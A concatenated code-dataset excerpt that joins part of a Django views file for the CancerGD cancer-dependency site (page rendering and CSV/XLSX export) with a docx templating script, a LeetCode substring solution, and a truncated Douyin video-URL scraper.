nodes:\n node_list.append(initial_nodes[protein])\n \n edge_list = [] # Will be an array of tuples.\n for edge in edges:\n proteins = edge.split('#')\n if len(proteins) != 2:\n err_msg += \"\\n**** Expected two proteins in edge, but got: \"+edge\n elif proteins[0].replace('9606.', '') not in initial_nodes:\n err_msg += \"\\n**** Protein1 %s in edge %s, isn't in the initial_nodes: %s\" %(proteins[0],edge,initial_nodes)\n elif proteins[1].replace('9606.', '') not in initial_nodes:\n err_msg += \"\\n**** Protein2 %s in edge %s, isn't in the initial_nodes: %s\" %(proteins[1],edge,initial_nodes)\n else: \n node1 = initial_nodes[proteins[0].replace('9606.', '')]\n node2 = initial_nodes[proteins[1].replace('9606.', '')]\n edge_list.append( ( node1, node2 ) )\n\n if err_msg != '':\n print(err_msg)\n return plain_error('ERROR:'+err_msg)\n \n context = {'node_list': node_list, 'edge_list': edge_list}\n return render(request, 'gendep/cytoscape.html', context)\n\n\n \ndef gene_info(request, gene_name):\n try: \n data = gene_info_as_dictionary( Gene.objects.get(gene_name=gene_name) )\n data['success'] = True # Add success: True to the json response.\n return JsonResponse(data, safe=False)\n \n except ObjectDoesNotExist: # Not found by the objects.get()\n return json_error(\"Gene '%s' NOT found in Gene table\" %(gene_name))\n\n \ndef show_study(request, study_pmid):\n requested_study = get_object_or_404(Study, pk=study_pmid)\n # requested_study = get_object_or_404(Study, pk='Pending001') # Temportary for now.\n return render(request, 'gendep/study.html', {'study': requested_study})\n\ndef about(request):\n return render(request, 'gendep/about.html')\n\ndef tutorial(request):\n return render(request, 'gendep/tutorial.html')\n\n\ndef drivers(request):\n driver_list = build_driver_list('driverspage')\n histotype_list = Dependency.HISTOTYPE_CHOICES\n study_list = Study.objects.order_by('pmid') \n context = {'driver_list': driver_list, 'histotype_list': histotype_list, 'study_list': study_list}\n return render(request, 'gendep/drivers.html', context)\n\ndef targets(request):\n target_list = Gene.objects.filter(is_target=True).order_by('gene_name') # Needs: (is_driver=True), not just: (is_target) \n context = {'target_list': target_list}\n return render(request, 'gendep/targets.html', context)\n \ndef tissues(request):\n histotype_list = Dependency.HISTOTYPE_CHOICES\n context = {'histotype_list': histotype_list}\n return render(request, 'gendep/tissues.html', context)\n \ndef studies(request):\n # study_list = Study.objects.order_by('pmid')\n # Could also add driver names lists in this query:\n study_list = Study.objects.raw(\"SELECT S.pmid, S.title, S.authors, S.experiment_type, S.journal, S.pub_date, S.num_targets, \"\n + \"COUNT(DISTINCT D.driver) AS num_drivers, \" # Or change to driver_entrez ?\n + \"COUNT(DISTINCT D.histotype) AS num_histotypes, \" \n + group_concat('D.histotype') + \" AS histotype_list, \"\n + \"COUNT(DISTINCT D.target) AS num_targets_in_db \" # Not displayed at present\n + \"FROM gendep_dependency D INNER JOIN gendep_study S ON (D.pmid = S.pmid) \"\n + \"GROUP BY D.pmid ORDER BY S.pmid ASC\"\n )\n histotype_list = Dependency.HISTOTYPE_CHOICES \n context = {'study_list': study_list, 'histotype_list': histotype_list}\n return render(request, 'gendep/studies.html', context)\n\ndef faq(request):\n current_url = request.META['HTTP_HOST'] # See download_dependencies_as_csv_file() for other, maybe better, ways to obtain currrent_url\n context = {'current_url': current_url}\n return render(request, 'gendep/faq.html', context)\n \ndef contact(request):\n return render(request, 'gendep/contact.html')\n\ndef news(request):\n # news_list = News.objects.filter(deleted=False).order_by('-id') # for reverse id order (ie. most recently posted is first.\n \n # news_list = News.objects.order_by('-id') # for reverse id order (ie. most recently posted is first.\n # Unused code for news template: {% if news.img_filename not empty %}{% if news.img_link %}{% endif %}{% if news.img_link %}{% endif %}{% endif %}\n # Want list in reverse order:\n \"\"\"\n This news array is no longer needed as now editting the static News page directly:\n news_list = (\n {'id':'4', 'content':'Added data from Meyers(2017).', 'first_posted':'16-Nov-2017', 'last_edited':'16-Nov-2017'},\n {'id':'3', 'content':'Added Fifty additional driver genes.', 'first_posted':'23-Oct-2017', 'last_edited':'23-Oct-2017'},\n {'id':'2', 'content':'Data added from the McDonald(2017) [Project DRIVE ATARiS] and Tsherniak(2017) [Project Achilles v2.20.2] studies.', 'first_posted':'16-Oct-2017', 'last_edited':'16-Oct-2017'},\n {'id':'1', 'content':'The manuscript describing CancerDG.org is available here.', 'first_posted':'14-July-2014', 'last_edited':'14-July-2014'},\n )\n context = {'news_list': news_list}\n \"\"\"\n context = {}\n return render(request, 'gendep/news.html', context)\n # If in admin mode then can edit the above news items? - ie. pass an extra parameter\n\ndef download(request):\n # download_list = Download.objects.filter(deleted=False).order_by('-id') # for reverse id order (ie. most recently posted is first.\n \n # download_list = Download.objects.order_by('-id') # for reverse id order (ie. most recently posted is first.\n # Unused code for news template: {% if news.img_filename not empty %}{% if news.img_link %}{% endif %}{% if news.img_link %}{% endif %}{% endif %}\n \n # Want list in reverse order:\n \"\"\"\n This download list is no longer needed as now editting the static Downloads page directly: \n download_list = (\n {'id':'12', 'type':'SQLite Database of All dependencies', 'filename':'all_dependencies_16Nov2017.sqlite3.xz', 'date_created':'16-Nov-2017', 'changes':'Added Meyers(2017) data'},\n {'id':'11', 'type':'CSV text file of All dependencies', 'filename':'all_dependencies_16Nov2017.csv.xz', 'date_created':'16-Nov-2017', 'changes':'Added Meyers(2017) data'},\n {'id':'10', 'type':'CSV text file of Multi-hit dependencies', 'filename':'multihit_dependencies_16Nov2017.csv.xz', 'date_created':'16-Nov-2017', 'changes':'Added Meyers(2017) data'},\n {'id':'9', 'type':'SQLite Database of All dependencies', 'filename':'all_dependencies_23Oct2017.sqlite3.xz', 'date_created':'23-Oct-2017', 'changes':'Added Fifty additional driver genes'},\n {'id':'8', 'type':'CSV text file of All dependencies', 'filename':'all_dependencies_23Oct2017.csv.xz', 'date_created':'23-Oct-2017', 'changes':'Added Fifty additional driver genes'},\n {'id':'7', 'type':'CSV text file of Multi-hit dependencies', 'filename':'multihit_dependencies_23Oct2017.csv.xz', 'date_created':'23-Oct-2017', 'changes':'Added Fifty additional driver genes'},\n {'id':'6', 'type':'SQLite Database of All dependencies', 'filename':'all_dependencies_17Oct2017.sqlite3.xz', 'date_created':'17-Oct-2017', 'changes':'Added McDonald(2017) and Tsherniak(2017) data'},\n {'id':'5', 'type':'CSV text file of All dependencies', 'filename':'all_dependencies_17Oct2017.csv.xz', 'date_created':'17-Oct-2017', 'changes':'Added McDonald(2017) and Tsherniak(2017) data'},\n {'id':'4', 'type':'CSV text file of Multi-hit dependencies', 'filename':'multihit_dependencies_17Oct2017.csv.xz', 'date_created':'17-Oct-2017', 'changes':'Added McDonald(2017) and Tsherniak(2017) data'},\n {'id':'3', 'type':'SQLite Database of All dependencies', 'filename':'all_dependencies_1Apr2017.sqlite3.xz', 'date_created':'1-Apr-2017', 'changes':'Original data'},\n {'id':'2', 'type':'CSV text file of All dependencies', 'filename':'all_dependencies_1Apr2017.csv.xz', 'date_created':'1-Apr-2017', 'changes':'Original data'},\n {'id':'1', 'type':'CSV text file of Multi-hit dependencies', 'filename':'multihit_dependencies_1Apr2017.csv.xz', 'date_created':'1-Apr-2017', 'changes':'Original data'},\n )\n context = {'download_list': download_list}\n \"\"\"\n \n context = {}\n return render(request, 'gendep/download.html', context)\n # If in admin mode then can edit the above news items? - ie. pass an extra parameter\n\n\"\"\"\ndef edit_news(request):\n news_list = News.objects.filter(deleted=False).order_by('-id') # for reverse id order (ie. most recently posted is first.\n # Unused code for news template: {% if news.img_filename not empty %}{% if news.img_link %}{% endif %}{% if news.img_link %}{% endif %}{% endif %}\n context = {'news_list': news_list}\n return render(request, 'gendep/news.html', context)\n\"\"\"\n\n\nsearch_by_driver_column_headings_for_download = ['Dependency', 'Dependency description', 'Entez_id', 'Ensembl_id', 'Ensembl_protein_id', 'Dependency synonyms', 'Wilcox P-value', 'Effect size', 'Z diff', 'Tissue', 'Study', 'PubMed Id', 'Experiment Type', 'Multiple hit', 'String interaction', 'Inhibitors', 'Boxplot link'] \nsearch_by_target_column_headings_for_download = ['Driver', 'Driver description', 'Entez_id', 'Ensembl_id', 'Ensembl_protein_id', 'Driver synonyms', 'Wilcox P-value', 'Effect size', 'Z diff', 'Tissue', 'Study', 'PubMed Id', 'Experiment Type', 'Multiple hit', 'String interaction', 'Inhibitors', 'Boxplot link']\n\n\ndef download_dependencies_as_csv_file(request, search_by, entrez_id, histotype_name, study_pmid, delim_type='csv'):\n \"\"\" Creates then downloads the current dependency result table as a tab-delimited file.\n The download get link needs to contain: serach_by, gene, tissue, study parameters.\n\n In Windows at least, 'csv' files are associated with Excel, so will be opened by Excel. \n To also associate a '.tsv' file with excel: In your browser, create a helper preference associating file type 'text/tab-separated values' and file extensions 'tsv' with application 'Excel'. Pressing Download will then launch Excel with the '.tsv' data file.\n \n ***** Remember to add to the select_related lists below if other columns are required for output.\n \"\"\"\n \n # mimetype = html_mimetype # was: 'application/json'\n \n # see: http://stackoverflow.com/questions/6587393/resource-interpreted-as-document-but-transferred-with-mime-type-application-zip\n \n # For downloading large csv files, can use streaming: https://docs.djangoproject.com/en/1.9/howto/outputting-csv/#streaming-large-csv-files\n \n # request_method = request.method # 'POST' or 'GET'\n # if request_method != 'GET': return HttpResponse('Expected a GET request, but got a %s request' %(request_method), html_mimetype)\n # search_by = request.GET.get('search_by', \"\") # It's an ajax POST request, rather than the usual ajax GET request\n # gene_name = request.GET.get('gene', \"\")\n # histotype_name = request.GET.get('histotype', \"ALL_HISTOTYPES\")\n # study_pmid = request.GET.get('study', \"ALL_STUDIES\")\n\n search_by_driver = is_search_by_driver(search_by) # Checks is valid and returns true if search_by='driver'\n\n # *** Remember to add to these select_related lists if other columns are required for output:\n RAW = True\n if RAW:\n error_msg, dependency_list = build_rawsql_dependency_query(search_by, entrez_id, histotype_name, study_pmid, order_by='wilcox_p', query_type='dependency_gene_study') \n else: \n select = 'target' if search_by_driver else 'driver' \n # select_related = [ 'target__inhibitors', search_by, 'study' ] if search_by_driver else [ 'driver__inhibitors', search_by, 'study' ] # Could add 'target__ensembl_protein_id' or 'driver__ensembl_protein_id' \n # But for a more precise query (and so faster as retrieves fewer columns) is:\n select_related = [ select+'__gene_name', select+'__full_name', select+'__entrez_id', select+'__ensembl_id', select+'__ensembl_protein_id', select+'__prevname_synonyms', \n 'study__short_name', 'study__experiment_type', 'study__title' ] # don't need 'study__pmid' (as is same as d.study_id)\n error_msg, dependency_list = build_dependency_query(search_by, entrez_id, histotype_name, study_pmid, order_by='wilcox_p', select_related=select_related) # using 'select_related' will include all the Gene info for the target/driver in one SQL join query, rather than doing multiple subqueries later.\n \n if error_msg != '': return html_error(\"Error: \"+error_msg)\n\n # print(\"Query SQL:\",dependency_list.query)\n \"\"\"\nQuery SQL:\n\nRaw SQL would be:\n\nSELECT \n \"gendep_dependency\".\"id\", \"gendep_dependency\".\"driver_name\", \"gendep_dependency\".\"target_name\", \"gendep_dependency\".\"mutation_type\", \"gendep_dependency\".\"wilcox_p\", \"gendep_dependency\".\"effect_size\", \"gendep_dependency\".\"za\", \"gendep_dependency\".\"zb\", \"gendep_dependency\".\"zdiff\", \"gendep_dependency\".\"interaction\", \"gendep_dependency\".\"pmid\", \"gendep_dependency\".\"study_table\", \"gendep_dependency\".\"histotype\", \"gendep_dependency\".\"boxplot_data\",\n T3.\"gene_name\", T3.\"original_name\", T3.\"is_driver\", T3.\"is_target\", T3.\"full_name\", T3.\"ensembl_id\", T3.\"ensembl_protein_id\", T3.\"entrez_id\", T3.\"cosmic_id\", T3.\"cancerrxgene_id\", T3.\"omim_id\", T3.\"uniprot_id\", T3.\"vega_id\", T3.\"hgnc_id\", T3.\"prevname_synonyms\", T3.\"driver_num_studies\", T3.\"driver_study_list\", T3.\"driver_num_histotypes\", T3.\"driver_histotype_list\", T3.\"driver_num_targets\", T3.\"target_num_drivers\", T3.\"target_num_histotypes\", T3.\"inhibitors\", T3.\"ncbi_summary\",\n \"gendep_study\".\"pmid\", \"gendep_study\".\"code\", \"gendep_study\".\"short_name\", \"gendep_study\".\"title\", \"gendep_study\".\"authors\", \"gendep_study\".\"experiment_type\", \"gendep_study\".\"abstract\", \"gendep_study\".\"summary\", \"gendep_study\".\"journal\", \"gendep_study\".\"pub_date\", \"gendep_study\".\"num_drivers\", \"gendep_study\".\"num_histotypes\", \"gendep_study\".\"num_targets\"\nFROM \"gendep_dependency\"\nINNER JOIN \"gendep_gene\" T3 ON (\"gendep_dependency\".\"target\" = T3.\"gene_name\")\nINNER JOIN \"gendep_study\" ON (\"gendep_dependency\".\"pmid\" = \"gendep_study\".\"pmid\")\nWHERE (\"gendep_dependency\".\"driver_name\" = ERBB2 AND \"gendep_dependency\".\"histotype\" = PANCAN AND \"gendep_dependency\".\"wilcox_p\" <= 0.05)\nORDER BY \"gendep_dependency\".\"wilcox_p\"\nASC\n\n[08/Jun/2016 01:19:49] \"GET /gendep/download_csv/xlsx/driver/ERBB2/PANCAN/ALL_STUDIES/ HTTP/1.1\" 200 91646\n \"\"\"\n\n# ** Warning: If you are performing queries on MySQL, note that MySQL’s silent type coercion may cause unexpected results when mixing types. If you query on a string type column, but with an integer value, MySQL will coerce the types of all values in the table to an integer before performing the comparison. For example, if your table contains the values 'abc', 'def' and you query for WHERE mycolumn=0, both rows will match. To prevent this, perform the correct typecasting before using the value in a query.\n# from: https://docs.djangoproject.com/en/1.9/topics/db/sql/\n \n \n histotype_full_name = get_histotype_full_name(histotype_name)\n if histotype_full_name is None: return html_error(\"Error: Tissue '%s' NOT found in histotype list\" %(histotype_name))\n \n study = get_study(study_pmid)\n if study is None: return html_error(\"Error: Study pmid='%s' NOT found in Study table\" %(study_pmid))\n\n # Retrieve the host domain for use in the boxplot file links:\n # current_url = request.META['HTTP_HOST']\n\n # Set the deliminators\n # Another alternative would be: csv.unix_dialect\n # csv.excel_tab doesn't display well.\n if delim_type=='csv':\n dialect = csv.excel\n content_type = csv_mimetype # can be called: 'application/x-csv' or 'application/csv'\n elif delim_type=='tsv':\n dialect = csv.excel_tab\n content_type = tab_mimetype\n elif delim_type=='xlsx': # A real Excel file.\n content_type = excel_minetype\n else:\n return html_error(\"Error: Invalid delim_type='%s', as must be 'csv' or 'tsv' or 'xlsx'\"%(delim_type))\n\n timestamp = time.strftime(\"%d-%b-%Y\") # To add time use: \"%H:%M:%S\")\n\n# Maybe better to fetch the gene_name here ....\n\n dest_filename = ('dependency_%s_%s_%s_%s_%s.%s' %(search_by,entrez_id,histotype_name,study_pmid,timestamp,delim_type)).replace(' ','_') # To also replace any spaces with '_' \n # NOTE: Is '.csv' so that Windows will then know to open Excel, whereas if is '.tsv' then won't.\n\n # Create the HttpResponse object with the CSV/TSV header and downloaded filename:\n response = HttpResponse(content_type=content_type) # Maybe use the type for tsv files? \n response['Content-Disposition'] = 'attachment; filename=\"%s\"' %(dest_filename)\n\n count = 0\n if not RAW: count = dependency_list.count()\n \n study_name = \"All studies\" if study_pmid=='ALL_STUDIES' else study.short_name\n # Using 'and' rather than comma below as a comma would split the line in csv files:\n # query_text = \"%s='%s' and Tissue='%s' and Study='%s'\" % (search_by.title(), gene_name, histotype_full_name, study_name) \n query_text = \"%s entrez_id='%s' and Tissue='%s' and Study='%s'\" % (search_by.title(), entrez_id, histotype_full_name, study_name)\n \n file_download_text = \"Downloaded from cancergd.org on %s\" %(timestamp)\n \n column_headings = search_by_driver_column_headings_for_download if search_by_driver else search_by_target_column_headings_for_download\n\n if delim_type == 'csv' or delim_type == 'tsv':\n write_csv_or_tsv_file(response, dependency_list, search_by_driver, query_text, column_headings, file_download_text, delim_type, dialect)\n else: # elif delim_type=='xlsx': # Real excel file\n write_xlsx_file(response, dependency_list, search_by_driver, query_text, column_headings, file_download_text)\n \n return response\n \n\n\ndef write_csv_or_tsv_file(response, dependency_list, search_by_driver, query_text, column_headings, file_download_text, delim_type, dialect):\n # delim_type is:'csv' or 'tsv'\n \n import io\n # writer = csv.writer(response, dialect=dialect)\n response_stringio = io.StringIO()\n writer = csv.writer(response_stringio, dialect=dialect)\n # Maybe: newline='', Can add: quoting=csv.QUOTE_MINIMAL, or csv.QUOTE_NONE, or csv.QUOTE_NONNUMERIC; Dialect.delimiter, Dialect.lineterminator\n\n writer.writerows([\n # [\"\",file_description,], # Added extra first column so Excel knows from first row that is CSV. BUT don't know the row count here, so will prepend this at end to the html response.\n [\"\",file_download_text,],\n [\"\",],\n ]) # Note needs the comma inside each square bracket to make python interpret each line as list than that string\n\n writer.writerow(column_headings) # The writeheader() with 'fieldnames=' parameter is only for the DictWriter object.\n\n # Now write the dependency rows:\n count = 0\n for d in dependency_list: # Not using iteractor() as count() above will already have run the query, so is cached, as the rawsql doesn't support iterator()\n count+=1 \n # If could use 'target AS gene' or 'driver AS gene' in the django query then would need only one output:\n # Cannot use 'gene_id' as variable, as that will refer to the primary key of the Gene table, so returns a tuple.\n# gene_symbol = d.target_id if search_by_driver else d.driver_id # d.target_id but returns name as a tuple, # same as: d.target.gene_name\n# gene_symbol = d.target_name_id if search_by_driver else d.driver_name_id # d.target_id but returns name as a tuple, # same as: d.target.gene_name \n \n# As using RawSQL then the following aren't needed: \n# gene_symbol= d.target.gene_name # d.target_id but returns name as a tuple, # same as: d.target.gene_name\n# full_name = d.target.full_name\n# entrez_id = d.target.entrez_id\n# ensembl_id = d.target.ensembl_id\n# protein_id = d.target.ensembl_protein_id\n# synonyms = d.target.prevname_synonyms\n# inhibitors = d.target.inhibitors\n# else: # search_by target\n# gene_symbol= d.driver.gene_name # d.driver_id, # same as: d.driver.gene_name\n# full_name = d.driver.full_name\n# entrez_id = d.driver.entrez_id\n# ensembl_id = d.driver.ensembl_id\n# protein_id = d.driver.ensembl_protein_id\n# synonyms = d.driver.prevname_synonyms\n# inhibitors = d.driver.inhibitors\n #print(gene_symbol, d.target.gene_name)\n \n# print(help(d))\n\n# for x in d.__dict__.keys():\n# if not x.startswith('_'):\n# print(x,d.__dict__[x])\n# print(\"\") \n\n writer.writerow([\n d.gene_name, d.full_name, d.entrez_id, d.ensembl_id, d.ensembl_protein_id, d.prevname_synonyms,\n format(d.wilcox_p, \".1e\").replace(\"e-0\", \"e-\"),\n format(d.effect_size*100, \".1f\"), # As a percentage with 1 decimal place\n format(d.zdiff,\".2f\"), # Usually negative\n Dependency.histotype_full_name(d.histotype), # was: d.get_histotype_display()\n d.short_name, d.study_id, d.experiment_type,\n d.multi_hit, \n d.interaction,\n d.inhibitors\n ])\n # d.study_id is same as 'd.study.pmid' \n # Could add weblinks to display the SVG boxplots by pasting link into webbrowser:\n # this 'current_url' is a temporary fix: (or use: StaticFileStorage.url )\n # 'http://'+current_url+'/static/gendep/boxplots/'+d.boxplot_filename()\n\n \n # Finally slose the StringIO file:\n file_description = \"A total of %d dependencies were found for: \" %(count) + query_text\n # Start with a comma or tab to add an extra first column so Excel knows from first row that is CSV.\n # The \"\\n\" could be \"\\r\\n\" if windows dialect of csv writer was used:\n response.write( (\",\" if delim_type=='csv' else \"\\t\") + file_description + \"\\n\" + response_stringio.getvalue() ) # getvalue() similar to: response_stringio.seek(0); response_stringio.read()\n response_stringio.close() # To free the memory.\n\n \n \n\ndef write_xlsx_file(response, dependency_list, search_by_driver, query_text, column_headings, file_download_text): \n# elif delim_type=='xlsx': # Real excel file\n\n import xlsxwriter # need to install this 'xlsxwriter' python module\n\n # An advantage of Excel format is if import tsv file Excel changes eg. MARCH10 or SEP4 to a date, whereas creating the Excle file doesn't\n # Also can add formatting, better url links, and include box-plot images.\n # Can write directly to the response which is a file-like object. (Alternatively can write to io.stringio first.\n workbook = xlsxwriter.Workbook(response, {'in_memory': True})\n # As output is small, {'in_memory': True} avoids using temp files on server, and avoids the error: \"HttpResponse has no attribute seek\"\n # or: with xlsxwriter.Workbook(iobytes_output, {'in_memory': True}) as workbook: (then don't need to close() it)\n \n # From: https://groups.google.com/forum/#!topic/python-excel/0vWPLht7K64\n # Change the default font from Calibri 11 to Arial 10 (as Mac Numbers app doesn't have Calibri so needs to convert to MS font):\n workbook.formats[0].font_name = 'Arial'\n workbook.formats[0].font_size = 10\n \n ws = workbook.add_worksheet() # can have optional sheet_name parameter\n yellow = '#FFFFEE' # a light yellow\n bold = workbook.add_format({'bold': True}) # Add a bold format to use to highlight cells.\n # bold_cyan = workbook.add_format({'bold': True, 'bg_color': 'cyan'}) # Add a bold blue format.\n # bold_yellow = workbook.add_format({'bold': True, 'bg_color': yellow}) # Add a bold blue format.\n # bg_yellow = workbook.add_format({'bg_color': yellow})\n # But when use background colour then hides the vertical grid lines that separate the cells\n align_center = workbook.add_format({'align':'center'})\n exponent_format = workbook.add_format({'num_format': '0.00E+00', 'align':'center'}) # For wilcox_p (eg 1 x 10^-4).\n percent_format = workbook.add_format({'num_format': '0.00\"%\"', 'align':'center'}) # For effect_size.\n two_decimal_places = workbook.add_format({'num_format': '0.00', 'align':'center'}) # For Z-diff.\n\n \n # can also set border formats using: set_bottom(), set_top(), set_left(), set_right()\n # also can set cell bg colours (eg: 'bg_color'), etc http://xlsxwriter.readthedocs.org/format.html\n\n description_row = 1 # As create the description at end when count is available.\n # ws.write_string( description_row, 1, file_description )\n ws.write_string( 2, 1, file_download_text )\n ws.write_row ( 4, 0, column_headings, bold)\n # ws.set_row(row, None, bold) # To make title row bold - but already set to bold above in write_row\n ws.set_column(0, 0, 12) # To make Gene name column (col 0) a bit wider\n ws.set_column(1, 1, 35) # To make Description column (col 1) wider\n ws.set_column(3, 4, 16) # To make ensembl ids (col 3 and 4) wider\n ws.set_column(5, 5, 35) # To make Synonyms column (col 5) wider\n ws.set_column(6, 13, 11) # To make columns 6 to 13 a bit wider\n ws.set_column(14, 14, 14) # To make Experiment_type (col 14) a bit wider\n row = 4 # The last row to writen\n\n # Now write the dependency rows:\n count = 0\n for d in dependency_list: # Not using iteractor() as count() above will already have run the query, so is cached, as the rawsql doesn't support iterator()\n count+=1\n # If could use 'target AS gene' or 'driver AS gene' in the django query then would need only one output: \n # Cannot use 'gene_id' as variable, as that will refer to the primary key of the Gene table, so returns a tuple.\n # gene_symbol = d.target_id if search_by_driver else d.driver_id # d.target_id but returns name as a tuple, # same as: d.target.gene_name\n \n row += 1\n\n ws.write_string(row, 0, d.gene_name, bold)\n ws.write_string(row, 1, d.full_name)\n ws.write_string(row, 2, d.entrez_id)\n ws.write_string(row, 3, d.ensembl_id)\n ws.write_string(row, 4, d.ensembl_protein_id)\n ws.write_string(row, 5, d.prevname_synonyms)\n ws.write_number(row, 6, d.wilcox_p, exponent_format)\n ws.write_number(row, 7, d.effect_size, percent_format)\n ws.write_number(row, 8, d.zdiff, two_decimal_places)\n ws.write_string(row, 9, Dependency.histotype_full_name(d.histotype))\n ws.write_string(row, 10, d.short_name)\n ws.write_url( row, 11, url=Study.url(d.study_id), string=d.study_id, tip='PubmedId: '+d.study_id+' : '+d.title) # cell_format=bg_yellow # d.study_id is same as 'd.study.pmid'\n # WAS: ws.write_url( row, 11, url=d.study.url(), string=d.study_id, tip='PubmedId: '+d.study_id+' : '+d.study.title) # cell_format=bg_yellow # d.study_id is same as 'd.study.pmid'\n ws.write_string(row, 12, d.experiment_type)\n ws.write_string(row, 13, d.multi_hit)\n ws.write_string(row, 14, d.interaction, align_center)\n ws.write_string(row, 15, d.inhibitors)\n # WAS: ws.write_string(row, 16, d.study.summary)\n \n # ADD THE FULL STATIC PATH TO THE url = .... BELOW:\n # ws.write_url( row, 14, url = 'gendep/boxplots/'+d.boxplot_filename, string=d.boxplot_filename, tip='Boxplot image')\n # ws.insert_image(row, col, STATIC.....+d.boxplot_filename [, options]) # Optionally add the box-plots to excel file.\n\n # Finally: \n file_description = \"A total of %d dependencies were found for: \" %(count) + query_text\n\n # Close the Excel file:\n ws.write_string( description_row, 1, file_description )\n workbook.set_properties({\n 'title': file_description,\n 'subject': 'Cancer Genetic Dependencies',\n 'author': 'CancerGD.org',\n 'manager': 'Dr. Colm Ryan',\n 'company': 'Systems Biology Ireland',\n 'category': '',\n 'keywords': 'Sample, Example, Properties',\n 'comments': 'Created with Python and XlsxWriter. '+file_download_text,\n 'status': '',\n 'hyperlink_base': '',\n })\n workbook.close() # must close to save the contents.\n \n # xlsx_data = output.getvalue()\n # response.write(iobytes_output.getvalue()) # maybe add: mimetype='application/ms-excel'\n # or:\n # output.seek(0)\n # response = HttpResponse(output.read(), content_type=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\")\n\n","repo_name":"cancergenetics/cancergd","sub_path":"gendep/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":99796,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"38742613474","text":"import re\nfrom docx import Document\nfrom docx2pdf import convert\n\nfilename = \"data/TROD_angine_docx.docx\"\n\ndictionary_word = {\"identifiant_pharmacie\": \"Pharmacie du Bois plage en ré\",\n \"nom_pharmacien\": \"Jean Chatenet\",\n \"date_heure_test\": \"22/09/2023 à 14h30\",\n \"nom_patient\": \"tnndd92\",\n \"age_patient\": \"19\",\n \"p_ordo\": \"Non\",\n \"score_mac\": \"3\",\n \"1score\": \"1\",\n \"2score\": \"1\",\n \"3score\": \"1\",\n \"4score\": \"0\",\n \"5score\": \"0\",\n \"6score\": \"0\",\n \"7score\": \"3\",\n \"nom_test\": \"Pfizer TROD Angine\",\n \"lot_trod\": \"AK56FD\",\n \"date_trod\": \"04/2026\",\n \"ecouvillon_utilise\": \"celui prévu dans la boite\",\n \"resultattest\": \"POSITIF\",\n \"orientation_med\": \"Oui\",\n \"deliv_antibio\": \"Non\",\n \"trait_sympto\": \"Non\",\n \"control_int\": \"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus.\",\n \"control_ext\": \"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus.\",\n \"date_val\": \"01/01/2023\"\n }\n\n\ndef docx_replace_regex(doc_obj, regex, replace):\n for p in doc_obj.paragraphs:\n if regex.search(p.text):\n inline = p.runs\n for i in range(len(inline)):\n if regex.search(inline[i].text):\n text = regex.sub(replace, inline[i].text)\n inline[i].text = text\n for table in doc_obj.tables:\n for row in table.rows:\n for cell in row.cells:\n docx_replace_regex(cell, regex, replace)\n\n\ndef replace_in_word(filename, dictionary):\n doc = Document(filename)\n for word, replacement in dictionary.items():\n word_re = re.compile(word)\n docx_replace_regex(doc, word_re, replacement)\n doc.save('data/outputs/result2.docx')\n convert(\"data/outputs/result2.docx\", \"data/outputs/result2.pdf\")\n return doc\n\n# replace_in_word(filename, dictionary)\n","repo_name":"thainhienndd/pharmacie_automation","sub_path":"replace_word.py","file_name":"replace_word.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"34508860240","text":"\n# https://leetcode.com/problems/maximum-length-of-repeated-subarray/discuss/768495/longest-common-substring-python-dp-solution\n\n# https://leetcode.com/problems/longest-common-subsequence/discuss/598508/Python-DP-solution-with-Explanation-%2B-Thinking-process-%2B-Diagram\n\n# https://leetcode.com/problems/longest-common-subsequence/discuss/598285/Python-faster-than-90\n\nclass Solution:\n\tdef findLength(self, A , B) -> int:\n\n\t\tn = len(A)\n\t\tm = len(B)\n\t\t\n\t\t#Edge cases.\n\t\tif m == 0 or n == 0:\n\t\t\treturn 0\n\n\t\tif n == 1 and m == 1:\n\t\t\tif A[0] == B[0]:\n\t\t\t\treturn 1\n\t\t\telse:\n\t\t\t\treturn 0\n\t\t\n\t\t#Initializing first row and column with 0 (for ease i intialized everthing 0 :p)\n\t\tdp = [[0 for x in range(m + 1)] for y in range(n + 1)]\n\n\t\tfinal = 0\n\t\t\n\t\t#this code is a lot like longest common subsequence(only else condition is different). \n\t\tfor i in range(1, n + 1):\n\t\t\tfor j in range(1, m + 1):\n\t\t\t\tif A[i - 1] == B[j - 1]:\n\t\t\t\t\tdp[i][j] = 1 + dp[i - 1][j - 1]\n\n\t\t\t\telse:\n\t\t\t\t\tdp[i][j] = 0\n\n\t\t\t\tfinal = max(final, dp[i][j])\n\n\t\treturn final","repo_name":"ved93/deliberate-practice-challenges","sub_path":"code-everyday-challenge/n222_longest_common_substr_lcs.py","file_name":"n222_longest_common_substr_lcs.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21880413094","text":"import json\n\nimport requests\n\n\n# 获取真正的原始url\ndef get_duyin_raw_url(url):\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/65.0.3325.181 Safari/537.36'}\n try:\n http_result = requests.get(url, headers=headers, allow_redirects=False)\n if http_result.status_code == 302:\n url = http_result.headers[\"location\"]\n video_id = get_video_id_from_url(url)\n if len(video_id) > 0:\n url = \"https://www.iesdouyin.com/web/api/v2/aweme/iteminfo/?item_ids=\" + video_id\n http_result = requests.get(url, headers=headers)\n ret_info = json.loads(http_result.content)\n real_url = str(ret_info['item_list'][0]['video']['play_addr']['url_list'][0])\n real_url = real_url.replace(\"playwm\", \"play\")\n return real_url\n except:\n pass\n\n return \"\"\n\n\ndef get_video_id_from_url(url):\n find_keys = \"/share/video/\"\n find_pos = url.find(find_keys)\n if find_pos != -1:\n find_pos += len(find_keys)\n new_url = url[find_pos:-1]\n str_array = new_url.split(\"/\")\n if len(str_array) > 0:\n return str_array[0]\n return \"\"\n\n\n# 处理返回Url的内容\n# 逻辑:\n# 1:先找到playAddr: 2:再去切割,第二个就是我们要地址\ndef process_raw_video_url(reuslt):\n raw_url = \"\"\n find_url = \"playAddr: \"\n if len(reuslt) > 0:\n find_pos = reuslt.find(find_url)\n\n if find_pos != -1:\n new_url = reuslt[find_pos:-1]\n str_array = 